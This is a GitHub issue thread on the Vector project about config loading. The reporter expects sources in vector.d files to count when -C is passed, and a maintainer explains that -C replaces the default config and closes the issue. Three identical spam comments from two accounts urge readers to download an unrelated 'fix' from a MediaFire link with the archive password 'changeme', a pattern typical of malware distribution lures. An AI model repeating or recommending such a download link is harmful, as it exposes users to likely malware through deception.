### ISSUE TITLE
vector should only throw error about not finding sources once all configs are loaded (when -C is passed)

### ISSUE THREAD

**Issue by josh-m-sharpe** [vectordotdev/vector#21157]
### A note for the community

* Please vote on this issue by adding a 👍 [reaction](https://blog.github.com/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/) to the original issue to help the community and maintainers prioritize this request
* If you are interested in working on this issue or have submitted a pull request, please leave a comment

### Problem

I was trying to keep my configs organized:
/etc/vector/vector.yaml (for non-source/transform/sink things)

/etc/vector/vector.d/service-a.yaml (and some services, in their own files:)
/etc/vector/vector.d/service-b.yaml
/etc/vector/vector.d/service-etc.yaml

But vector won't start unless the primary config /etc/vector/vector.yaml (the default in my case) contains a 'sources' directive.

But... why?  I know i need sources.  I do in fact have them in the vector.d directory.  

This restraint seems unnecessary and it'd be nice if it were altered to only throw this error if/when no sources are detected once all configs have been loaded

### Configuration

```text
cat /etc/vector/vector.yaml
api:
  address: 0.0.0.0:8686
  enabled: true

cat /etc/vector.d/someservice.yaml
sources:
  -etcetcetc
```

### Version

vector 0.40.1 (aarch64-unknown-linux-gnu a9392b0 2024-08-26 14:35:19.223750502)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by josh-m-sharpe** [comment]
think just this reproduces:

`vector -C /etc/vector.d`

> What do you expect to happen in this case? That it starts without any components? #17557 may be a related request.

Well, it'd still read the default primary config (/etc/vector/vector.yaml), and would launch with whatever is in there.  And if no sources or other required things found after parsing all of those configs, only then raise an error.

**Comment by jszwedko** [comment]
> think just this reproduces:
> 
> `vector -C /etc/vector.d`
> 
> > What do you expect to happen in this case? That it starts without any components? #17557 may be a related request.
> 
> Well, it'd still read the default primary config (/etc/vector/vector.yaml), and would launch with whatever is in there. And if no sources or other required things found after parsing all of those configs, only then raise an error.

Gotcha, thanks! I think there might be some misunderstanding. `vector` will load `/etc/vector/vector.yaml` if no configuration flags are specified but if you specify `-C`/`--config-dir` or `-c`/`--config` only those configuration files will be loaded and the default configuration file will not be loaded.

**Comment by jszwedko** [comment]
Closing since I'm pretty confident in my response, and that this isn't actually a bug, but feel free to leave a comment if you disagree!
